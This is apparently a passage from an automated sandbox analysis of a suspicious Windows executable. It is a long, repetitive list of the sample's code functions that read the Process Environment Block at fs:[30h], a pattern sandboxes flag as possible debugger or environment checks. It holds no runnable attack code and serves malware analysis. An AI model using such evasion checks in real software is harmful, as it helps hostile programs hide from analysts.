          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A9B8D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A9B8D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A9B8D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A9B8D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]2_2_00A1B02A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]2_2_00A1B02A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]2_2_00A1B02A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B02A mov eax, dword ptr fs:[00000030h]2_2_00A1B02A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]2_2_00A3002D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]2_2_00A3002D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]2_2_00A3002D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]2_2_00A3002D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3002D mov eax, dword ptr fs:[00000030h]2_2_00A3002D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD4015 mov eax, dword ptr fs:[00000030h]2_2_00AD4015
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD4015 mov eax, dword ptr fs:[00000030h]2_2_00AD4015
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]2_2_00A87016
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]2_2_00A87016
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A87016 mov eax, dword ptr fs:[00000030h]2_2_00A87016
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD1074 mov eax, dword ptr fs:[00000030h]2_2_00AD1074
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC2073 mov eax, dword ptr fs:[00000030h]2_2_00AC2073
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A20050 mov eax, dword ptr fs:[00000030h]2_2_00A20050
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A20050 mov eax, dword ptr fs:[00000030h]2_2_00A20050
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A361A0 mov eax, dword ptr fs:[00000030h]2_2_00A361A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A361A0 mov eax, dword ptr fs:[00000030h]2_2_00A361A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A869A6 mov eax, dword ptr fs:[00000030h]2_2_00A869A6
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]2_2_00A851BE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]2_2_00A851BE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]2_2_00A851BE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A851BE mov eax, dword ptr fs:[00000030h]2_2_00A851BE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C182 mov eax, dword ptr fs:[00000030h]2_2_00A2C182
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A185 mov eax, dword ptr fs:[00000030h]2_2_00A3A185
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32990 mov eax, dword ptr fs:[00000030h]2_2_00A32990
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A0B1E1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A0B1E1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]2_2_00A0B1E1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A941E8 mov eax, dword ptr fs:[00000030h]2_2_00A941E8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov eax, dword ptr fs:[00000030h]2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A24120 mov ecx, dword ptr fs:[00000030h]2_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3513A mov eax, dword ptr fs:[00000030h]2_2_00A3513A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3513A mov eax, dword ptr fs:[00000030h]2_2_00A3513A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]2_2_00A09100
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]2_2_00A09100
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09100 mov eax, dword ptr fs:[00000030h]2_2_00A09100
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0C962 mov eax, dword ptr fs:[00000030h]2_2_00A0C962
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B171 mov eax, dword ptr fs:[00000030h]2_2_00A0B171
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0B171 mov eax, dword ptr fs:[00000030h]2_2_00A0B171
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2B944 mov eax, dword ptr fs:[00000030h]2_2_00A2B944
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2B944 mov eax, dword ptr fs:[00000030h]2_2_00A2B944
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]2_2_00A052A5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]2_2_00A052A5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]2_2_00A052A5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]2_2_00A052A5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A052A5 mov eax, dword ptr fs:[00000030h]2_2_00A052A5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]2_2_00A1AAB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]2_2_00A1AAB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]2_2_00A3FAB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3D294 mov eax, dword ptr fs:[00000030h]2_2_00A3D294
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3D294 mov eax, dword ptr fs:[00000030h]2_2_00A3D294
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32AE4 mov eax, dword ptr fs:[00000030h]2_2_00A32AE4
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32ACB mov eax, dword ptr fs:[00000030h]2_2_00A32ACB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A44A2C mov eax, dword ptr fs:[00000030h]2_2_00A44A2C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A44A2C mov eax, dword ptr fs:[00000030h]2_2_00A44A2C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A18A0A mov eax, dword ptr fs:[00000030h]2_2_00A18A0A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]2_2_00A05210
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov ecx, dword ptr fs:[00000030h]2_2_00A05210
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]2_2_00A05210
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A05210 mov eax, dword ptr fs:[00000030h]2_2_00A05210
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AA16 mov eax, dword ptr fs:[00000030h]2_2_00A0AA16
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AA16 mov eax, dword ptr fs:[00000030h]2_2_00A0AA16
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAA16 mov eax, dword ptr fs:[00000030h]2_2_00ACAA16
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACAA16 mov eax, dword ptr fs:[00000030h]2_2_00ACAA16
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A23A1C mov eax, dword ptr fs:[00000030h]2_2_00A23A1C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABB260 mov eax, dword ptr fs:[00000030h]2_2_00ABB260
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABB260 mov eax, dword ptr fs:[00000030h]2_2_00ABB260
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8A62 mov eax, dword ptr fs:[00000030h]2_2_00AD8A62
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4927A mov eax, dword ptr fs:[00000030h]2_2_00A4927A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]2_2_00A09240
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]2_2_00A09240
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]2_2_00A09240
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09240 mov eax, dword ptr fs:[00000030h]2_2_00A09240
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACEA55 mov eax, dword ptr fs:[00000030h]2_2_00ACEA55
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A94257 mov eax, dword ptr fs:[00000030h]2_2_00A94257
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]2_2_00AD5BA5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]2_2_00A34BAD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]2_2_00A34BAD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34BAD mov eax, dword ptr fs:[00000030h]2_2_00A34BAD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC138A mov eax, dword ptr fs:[00000030h]2_2_00AC138A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ABD380 mov ecx, dword ptr fs:[00000030h]2_2_00ABD380
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A11B8F mov eax, dword ptr fs:[00000030h]2_2_00A11B8F
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A11B8F mov eax, dword ptr fs:[00000030h]2_2_00A11B8F
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3B390 mov eax, dword ptr fs:[00000030h]2_2_00A3B390
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32397 mov eax, dword ptr fs:[00000030h]2_2_00A32397
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]2_2_00A303E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]2_2_00A303E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]2_2_00A303E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]2_2_00A303E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]2_2_00A303E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A303E2 mov eax, dword ptr fs:[00000030h]2_2_00A303E2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]2_2_00A2DBE9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A853CA mov eax, dword ptr fs:[00000030h]2_2_00A853CA
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A853CA mov eax, dword ptr fs:[00000030h]2_2_00A853CA
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC131B mov eax, dword ptr fs:[00000030h]2_2_00AC131B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]2_2_00A0DB60
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A33B7A mov eax, dword ptr fs:[00000030h]2_2_00A33B7A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A33B7A mov eax, dword ptr fs:[00000030h]2_2_00A33B7A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0DB40 mov eax, dword ptr fs:[00000030h]2_2_00A0DB40
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8B58 mov eax, dword ptr fs:[00000030h]2_2_00AD8B58
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0F358 mov eax, dword ptr fs:[00000030h]2_2_00A0F358
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1849B mov eax, dword ptr fs:[00000030h]2_2_00A1849B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC14FB mov eax, dword ptr fs:[00000030h]2_2_00AC14FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]2_2_00A86CF0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]2_2_00A86CF0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86CF0 mov eax, dword ptr fs:[00000030h]2_2_00A86CF0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]2_2_00AD8CD6
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3BC2C mov eax, dword ptr fs:[00000030h]2_2_00A3BC2C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]2_2_00AD740D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]2_2_00AD740D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD740D mov eax, dword ptr fs:[00000030h]2_2_00AD740D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]2_2_00A86C0A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]2_2_00A86C0A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]2_2_00A86C0A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86C0A mov eax, dword ptr fs:[00000030h]2_2_00A86C0A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC1C06 mov eax, dword ptr fs:[00000030h]2_2_00AC1C06
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2746D mov eax, dword ptr fs:[00000030h]2_2_00A2746D
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3A44B mov eax, dword ptr fs:[00000030h]2_2_00A3A44B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9C450 mov eax, dword ptr fs:[00000030h]2_2_00A9C450
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9C450 mov eax, dword ptr fs:[00000030h]2_2_00A9C450
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD05AC mov eax, dword ptr fs:[00000030h]2_2_00AD05AC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD05AC mov eax, dword ptr fs:[00000030h]2_2_00AD05AC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A335A1 mov eax, dword ptr fs:[00000030h]2_2_00A335A1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]2_2_00A31DB5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]2_2_00A31DB5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A31DB5 mov eax, dword ptr fs:[00000030h]2_2_00A31DB5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]2_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]2_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]2_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A32581 mov eax, dword ptr fs:[00000030h]2_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]2_2_00A02D8A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]2_2_00A02D8A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]2_2_00A02D8A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]2_2_00A02D8A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A02D8A mov eax, dword ptr fs:[00000030h]2_2_00A02D8A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FD9B mov eax, dword ptr fs:[00000030h]2_2_00A3FD9B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3FD9B mov eax, dword ptr fs:[00000030h]2_2_00A3FD9B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]2_2_00A1D5E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E0 mov eax, dword ptr fs:[00000030h]2_2_00A1D5E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]2_2_00ACFDE2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]2_2_00ACFDE2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]2_2_00ACFDE2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACFDE2 mov eax, dword ptr fs:[00000030h]2_2_00ACFDE2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AB8DF1 mov eax, dword ptr fs:[00000030h]2_2_00AB8DF1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]2_2_00A86DC9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]2_2_00A86DC9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]2_2_00A86DC9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov ecx, dword ptr fs:[00000030h]2_2_00A86DC9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]2_2_00A86DC9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A86DC9 mov eax, dword ptr fs:[00000030h]2_2_00A86DC9
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0AD30 mov eax, dword ptr fs:[00000030h]2_2_00A0AD30
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A13D34 mov eax, dword ptr fs:[00000030h]2_2_00A13D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACE539 mov eax, dword ptr fs:[00000030h]2_2_00ACE539
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]2_2_00A34D3B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]2_2_00A34D3B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A34D3B mov eax, dword ptr fs:[00000030h]2_2_00A34D3B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD8D34 mov eax, dword ptr fs:[00000030h]2_2_00AD8D34
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A8A537 mov eax, dword ptr fs:[00000030h]2_2_00A8A537
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C577 mov eax, dword ptr fs:[00000030h]2_2_00A2C577
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A2C577 mov eax, dword ptr fs:[00000030h]2_2_00A2C577
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A43D43 mov eax, dword ptr fs:[00000030h]2_2_00A43D43
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83540 mov eax, dword ptr fs:[00000030h]2_2_00A83540
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A27D50 mov eax, dword ptr fs:[00000030h]2_2_00A27D50
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]2_2_00AD0EA5
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD0EA5 mov eax, dword ptr fs:[00000030h]2_2_00AD0EA5
